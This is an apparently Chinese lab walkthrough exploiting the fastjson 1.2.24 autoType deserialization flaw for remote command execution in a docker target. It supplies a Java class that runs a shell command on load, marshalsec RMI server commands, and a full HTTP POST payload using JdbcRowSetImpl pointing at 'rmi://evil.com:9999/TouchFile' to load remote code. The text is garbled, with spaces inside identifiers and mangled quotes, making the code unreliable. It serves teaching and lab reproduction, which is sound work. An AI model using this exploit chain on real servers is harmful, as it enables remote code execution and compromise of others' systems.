fastjson 1.2.24 反序列化导致任意命令执行漏洞

本文介绍: fastjson在解析 json的过程中，支持使用 autoTyp e来实例化某一个具体的类，并调用该类的set/get 方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。

漏洞 描述

fa s t json在解析 js on的过程中，支持使用 autoTyp e来实例化某一个具体的类，并调用该类的set/get 方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。

参考资料：

漏洞 环境及利用

搭建 docker环境

环境运行后，访问即可看到JSON格式的输出。http://your-ip:8090

我们向这个地址POST一个JSON对象，即可更新服务端的信息：

curl http://your–ip:8090/ -H “Con t ent-Typ e: application/js on” —data ‘{“name“:”hello“, “a g e“:20}’

因为目标环境是Jav a 8u102，没有的限制，我们可以使用的利用链，借助JNDI注入来执行命令。com.sun.jndi.rmi.object.trustURLCodebasecom.sun.rowset.JdbcRowSetImpl

首先编译并上传命令执行代码

// java c Touc hFile.java
import java.lang.Runtime;
import java.lang.Proce ss;

public class Touc hFile {
static {
try {
Runtime rt = Runtime.getRuntime();
Strin g[] command s = {“touc h“, “/tmp/succe ss“};
Proce ss pc = rt.exec(command s);
pc.waitFor();
} catch (Exception e) {
// do noth in g
}
}

我这里直接用主机编译成字节码文件（最好不要拖，可能因为这个损坏文件不能复现）

将生成的字节码文件拖到虚拟机并在字节码文件处开启 http 服务

使用Jav a反序列化利用工具 m ar s hal sec辅助开启RMI环境

m ar s halsec：

git clone https://github.com/mbechler/marshalsec

maven：

sudo apt–get install maven

进入目录进行项目编译

mvn clean package -DskipTes ts

进入 target 目录，可以看到编译成功

执行

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://刚class 文件的ip或域名/#TouchFile” 9999

向靶场服务器发送Payload，带上RMI的地址：

POST / HTTP/1.1
Host: your–ip:8090
Accept-Enc od in g: gz ip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (com patible; MSIE 9.0; Win dows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/js on
Content-Length: 160

{
“b“:{
“@type“:”com.sun.row set.JdbcRowSetImpl”,
“dataSourceName”:”rmi://evil.com:9999/TouchFile”,
“autoCommit”:true
}
}